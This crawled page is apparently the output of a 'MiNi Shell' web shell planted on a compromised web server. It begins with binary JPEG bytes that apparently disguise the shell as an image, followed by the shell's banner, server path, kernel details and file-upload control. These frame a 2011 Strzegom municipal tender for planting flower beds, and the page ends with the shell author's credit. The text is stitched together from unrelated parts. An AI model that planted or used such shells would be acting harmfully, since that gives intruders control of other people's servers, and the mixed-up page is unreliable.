JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111209/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111209/325491-N-2011.html

<p class="kh_header"><b>Strzegom: OBSADZENIE I PIELĘGNACJA KLOMBÓW, GAZONÓW I AMPLI KWIATOWYCH W MIEŚCIE STRZEGOM W ROKU 2012</b><br>
<b>Numer ogłoszenia: 325491 - 2011; data zamieszczenia: 09.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Strzegom , ul. Rynek 38, 58-150 Strzegom, woj. dolnośląskie, tel. (074)  856-05-99, faks (074 ) 856-05-16.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.strzegom.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> OBSADZENIE I PIELĘGNACJA KLOMBÓW, GAZONÓW I AMPLI KWIATOWYCH W MIEŚCIE STRZEGOM W ROKU 2012.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem niniejszego zamówienia jest obsadzenie i pielęgnacja klombów, gazonów i ampli kwiatowych w mieście Strzegom w roku 2012. 

2. Obowiązkiem Wykonawcy będzie dostarczenie sadzonek będących własnością Wykonawcy, obsadzenie kwiatami  klombów kwiatowych oraz donic i skrzynek w miejscach wskazanych przez Zamawiającego, wraz z całosezonową pielęgnacją, podlewaniem i uzupełnianiem sadzonek. Na koniec okresu wegetacyjnego likwidacja nasadzeń i przekopanie rabat. 

3. Całość zamówienia obejmuje: 
I.	Letnie obsadzenie klombów oraz donic i skrzynek na terenie Miasta Strzegom kwiatami:

A. Obsadzenie kwiatami klombów od 15 maja 2012r. do 31 maja 2012r. wg zestawionych powierzchni, w sposób i terminach podanych poniżej: 
1. Klomb przed budynkiem Urzędu Miejskiego - 109 m2
2. Klomb przed budynkiem Urzędu Miejskiego - 8.50 m2
3. Klomb przed budynkiem Urzędu Miejskiego - 7.90 m2
4. Klomb przy fontannie -7.90 m2
5. Klomb przy fontannie -  22.30 m2
6 Klomb przy fontannie -  28.60 m2
7. Klomb przy fontannie -  5.20 m2
8. Klomb przy fontannie -  7.40 m2
9. Klomb przy fontannie -  28.30 m2
10. Klomb przy fontannie -  23.50 m2
11. Klomb przy fontannie -  10.20 m2
Ogólna powierzchnia klombów wynosi 258.80 m2. 
O obsadzeniu klombów Wykonawca powinien powiadomić Zamawiającego. 
Aranżację klombów Wykonawca powinien uzgodnić z Zamawiającym.

B. Obsadzenie kwiatami gazonów w terminie od 15 maja 2012r. do 31 maja 2012r. 
w miejscach: 
- w obrębie Strzegomskiego Rynku  - 17 szt. 
- w obrębie ul. Dąbrowskiego  - 13szt. 

O obsadzeniu gazonów Wykonawca powinien powiadomić Zamawiającego. 
Aranżację gazonów Wykonawca powinien uzgodnić z Zamawiającym.

C. Obsadzenie pelargoniami bluszczolistnymi pojedynczymi  koloru czerwonego ampli 
w ilości 26szt.  po 2 naczynia każdy, razem 52 naczynia, po 10 roślin w każdym naczyniu ampli w terminie do dnia 15 lutego 2012r. i zawieszenie ampli na latarniach ulicznych 
w miejscach wskazanych przez zamawiającego do dnia 15 maja 2012r.

Ample Wykonawca odbierze z Zakładu Usług Komunalnych w Strzegomiu, Aleja Wojska Polskiego 75 na swój koszt.                         
O obsadzeniu ampli Wykonawca powinien powiadomić Zamawiającego. Razem 520 szt. roślin.

D.  Obsadzenie pelargoniami bluszczolistnymi pojedynczymi  koloru czerwonego, białego, różowego ampli w ilości 10 szt.  po 2 naczynia każdy, razem 20 naczyń, po 10 roślin różnego koloru w każdym naczyniu ampli w terminie do dnia 15 lutego 2012r. i zawieszenie ampli na latarniach ulicznych w miejscach wskazanych przez zamawiającego do dnia 15 maja 2012r.

Ample Wykonawca odbierze z Zakładu Usług Komunalnych w Strzegomiu, Aleja Wojska Polskiego 75 na swój koszt.      
O obsadzeniu ampli Wykonawca powinien powiadomić Zamawiającego. Razem 200 szt. roślin.

E. Obsadzenie pelargoniami bluszczolistnymi pojedynczymi  koloru czerwonego, białego, różowego skrzynek balkonowych na budynek Urzędu Miejskiego w ilości 70 sztuk po 3 rośliny różnego koloru w skrzynce w terminie do dnia 15 lutego 2012r. i umieszczenie doniczek w miejscach wskazanych przez zamawiającego do dnia 15 maja 2012r.

Skrzynki Wykonawca odbierze z Urzędu Miejskiego w Strzegomiu, Rynek 38 na swój koszt.  
O obsadzeniu skrzynek Wykonawca powinien powiadomić Zamawiającego. Razem 210 szt. roślin.

II. Całosezonowa pielęgnacja dotyczy klombów, ampli i gazonów od momentu rozpoczęcia nasadzeń do 15 października 2012r. oraz likwidacja nasadzeń i przekopanie klombów od 16 października 2012r. (lub wcześniej po uszkodzeniu roślin przez mróz) do 30 października 2012r. w tym: 

A. Pielęgnacja nasadzeń od momentu rozpoczęcia nasadzeń do dnia 15 października 2012r. tj.:      
- podlewanie jeden raz w tygodniu a w przypadku wystąpienia wysokich  temperatur (powyżej 28oC) przez trzy dni następujące po sobie  2 razy w tygodniu (każdorazowe podlewanie należy potwierdzić na liście obecności dostępnej w Wydziale Gospodarki Komunalnej, Ochrony Środowiska i Wsi, II piętro, pokój 31),
- plewienie (należy nie dopuścić do zachwaszczenia gleby w klombach oraz gazonach), 
- nawożenie nawozami mineralnymi ( w zależności od kondycji rośliny należy używać nawozów wpływających na wzrost roślin, kwitnienie, wybarwianie), 


- czyszczenie przekwitów jeden raz w miesiącu, 
- uzupełnianie sadzonek zmrożonych, uszkodzonych przez zwierzęta i osoby trzecie,
- wywóz powstałej przy pielęgnacji rabat biomasy. 
 
B. Likwidacja nasadzeń i przekopanie gleby na łącznej powierzchni  m2 od 16 października 2012r. (lub wcześniej po uszkodzeniu roślin przez mróz) do 30 października 2012r.

Ample oraz skrzynki przed posadzeniem kwiatów należy zdezynfekować w celu zabezpieczenia roślin przed zarażeniem chorobami posezonowymi. Do posadzenia roślin należy zastosować podłoże typowe dla pelargonii z  zastosowaniem odpowiedniego nawozu wolnouwalniającego. 
W maju w momencie umieszczania ampli na latarniach ulicznych oraz skrzynek na budynku Urzędu Miejskiego rośliny muszą być krępe, zwarte o krótkich międzywęźlach bez znamion chorobowych. Rośliny muszą być w początkowej fazie kwitnienia z dużą ilością mocno zainicjonowanych pąków kwiatowych. Rośliny mają tworzyć koronę wokół naczynia. Zwis roślin 40-50 cm.  
Rośliny do nasadzeń klombów i gazonów muszą być krępe, zwarte o krótkich międzywęźlach bez znamion chorobowych, dobrze wybarwione. Zwis roślin minimum 20cm.
Canna w momencie wysadzania do gruntu musi mieć wysokość części zielonej 55-60cm ponad donicę, z pąkiem kwiatowym, bez znamion chorobowych.
Zamawiający zastrzega, że sadzonki, które uległy zmrożeniu, uszkodzeniu przez zwierzęta 
i osoby trzecie, wykonawca będzie musiał uzupełnić niezwłocznie na własny koszt bez dodatkowej zapłaty. Rozpoczęcie prac uzupełniających nastąpi w pierwszej dobie po powstaniu 
i stwierdzeniu zaistniałej szkody, o której Wykonawca zostanie poinformowany przez Zamawiającego telefonicznie. Zakończenie prac uzupełniających ma nastąpić najpóźniej do trzech dni od daty poinformowania Wykonawcy przez Zamawiającego. W razie nieterminowego dokonania uzupełnień Zamawiający będzie domagał się kar umownych. 
Kwiaty powinny zostać wysadzone do gruntu według aranżacji uzgodnionej 
z Zamawiającym.


WYKAZ SADZONEK DO NASADZEŃ W SEZONIE WEGETACJNYM 2012r. 


1) Pelargonia bluszczolistna pojedyńcza czerwona -	szt.	656


2) Pelargonia bluszczolistna pojedyńcza biała -
	szt.	137
3) Pelargonia bluszczolistna pojedyńcza różowa -
	szt.	137
4) Canna w kolorach żółtym, białym, różowym -
	szt. 	699
po 233 szt. 
z każdego koloru



5) Begonia semperflorens
(begonia drobna) 
w kolorach biały, czerwony	- szt.	4 000
po 2000 szt. każdego koloru

6) Sufrinia w 4 kolorach - szt.	400
po 100 szt. każdego koloru

7) Szałwia -
	szt. 	50
8) Starzec popielny -
	szt.	50
9) Ipomea black, lime	- szt.	200 
po 100 szt. każdego koloru

Łącznie:
	szt. 	6329.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie jets wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca, w ciągu ostatnich 3 lat przed upływem terminu składania ofert,  a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje co najmniej jedno obsadzenie klombów wraz z ich pielęgnacją o wartości minimum 90 000 zł brutto. Wykonawca musi wykazać, że  usługa ta została lub jest wykonywana należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.

1. Zamawiający dokona oceny spełniania powyższych warunków na podstawie złożonych przez Wykonawcę dokumentów i oświadczeń na zasadzie spełnia warunek/nie spełnia warunku. Z treści załączonych dokumentów i oświadczeń w sposób jednoznaczny musi wynikać spełnienie przez Wykonawcę wymaganych warunków.
2. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami      niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.
3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego warunki spełniają łącznie, natomiast każdy z wykonawców wspólnie ubiegających się o zamówienie zobowiązany jest wykazać brak podstaw do wykluczenia go z postępowania na podstawie 
art. 24 ust. 1 ustawy Pzp.

4. Wykonawcy wspólnie ubiegający się o zamówienie:
1)	ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zobowiązania,
2)	zobowiązani są ustanowić Pełnomocnika do reprezentowania ich w postępowaniu 
o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu 
i zawarcia umowy w sprawie zamówienia. Przyjmuje się, że pełnomocnictwo do
 podpisania oferty obejmuje pełnomocnictwo do poświadczenia za zgodność 
z  oryginałem wszystkich dokumentów,
3)	pełnomocnictwo musi wynikać z umowy lub z innej czynności prawnej, mieć formę pisemną; fakt ustanowienia Pełnomocnika musi wynikać z załączonych do oferty dokumentów, wszelka korespondencja prowadzona będzie z Pełnomocnikiem,
4)	jeżeli oferta konsorcjum zostanie wybrana jako najkorzystniejsza, Zamawiający może przed zawarciem umowy wezwać pełnomocnika do przedstawienia umowy regulującej współpracę tych Wykonawców, 
5)	Wszelka korespondencja dokonywana będzie z Wykonawcą występującym jako reprezentant pozostałych (liderem),
6)	Oferta musi być podpisana w taki sposób, aby prawnie zobowiązywała wszystkich Wykonawców występujących wspólnie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wzór umowy, która zawarta będzie z Wykonawcą stanowi załącznik nr 5 do SIWZ.
2. Zgodnie z postanowieniami art.144 ust. 1 ustawy Prawo zamówień publicznych Zamawiający przewiduje możliwość dokonania zmian po zawarciu umowy w sprawie zamówienia publicznego, pod warunkiem podpisania aneksu zaakceptowanego przez obie Strony. 
W szczególności Zamawiający dopuszcza: 
1) aktualizację danych Wykonawcy i Zamawiającego poprzez: zmianę nazwy firmy, zmianę     adresu siedziby, zmianę formy prawnej itp.,
2) zmianę terminów realizacji zamówienia z przyczyn niezależnych od Wykonawcy lub      Zamawiającego, które to przyczyny każda ze Stron musi udokumentować - pod warunkiem akceptacji takiej zmiany przez instytucję współfinansującą zadanie i pod warunkiem, że zmiana taka nie spowoduje utraty ani zmniejszenia dofinansowania,
3) jeżeli nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym  wpływ na realizację przedmiotu zamówienia, 
4) możliwa jest zmiana umowy w zakresie kluczowego personelu wykonawcy i Zmawiającego, za uprzednią zgodą zamawiającego wyrażoną na piśmie, akceptującą kandydata na kluczowe stanowisko kierownicze, 
5) możliwa jest zmiana umowy w zakresie podwykonawstwa, za uprzednią zgodą Zamawiającego: możliwe jest powierzenie podwykonawcom innej części zamówienia niż  wskazana w ofercie wykonawcy, o ile nie sprzeciwia się temu SIWZ.
3. Warunki dokonywania zmian: 
     3.1  inicjowanie zmian na wniosek Wykonawcy lub Zamawiającego, 
     3.2  uzasadnienie zmiany prawidłową realizacją przedmiotu umowy,
     3.3  zmiany umowy, o których mowa powyżej  muszą być dokonywane z zachowaniem przepisu art. 140 ust. 3 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz.U. z 2010 r. Nr 113, poz. 759 z późn. zm.) stanowiącego, że umowa podlega unieważnieniu w części wykraczającej poza określenie przedmiotu zamówienia zawarte w SIWZ. 
     3.4  forma pisemna pod rygorem nieważności w formie aneksu do umowy.
4. Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.strzegom.pl (pod ogłoszeniem)<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski, Rynek 38, 58-150 Strzegom, pok. 15 lub za zaliczeniem pocztowym. Cena specyfikacji 14,50 zł (plus koszty przesyłki).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.12.2011 godzina 11:30, miejsce: Urząd Miejski, Rynek 38, 58-150 Strzegom - Biuro Obsługi Interesanta, parter - pok. 15.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy. 
IV.4.7) Uprawnionymi do kontaktowania się z Wykonawcami jest pani Monika Pawlik - tel. 74/ 8 560 533 oraz pani Beata Wójcik - tel. - 74 8 560 531. 
IV.4.8) Kryteria oceny ofert: cena 100%. 
IV.4.9) Zamawiający nie zamierza zawierać umowy ramowej. 
IV.4.10) Zamawiający nie zamierza ustanawiać dynamicznego systemu zakupów.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com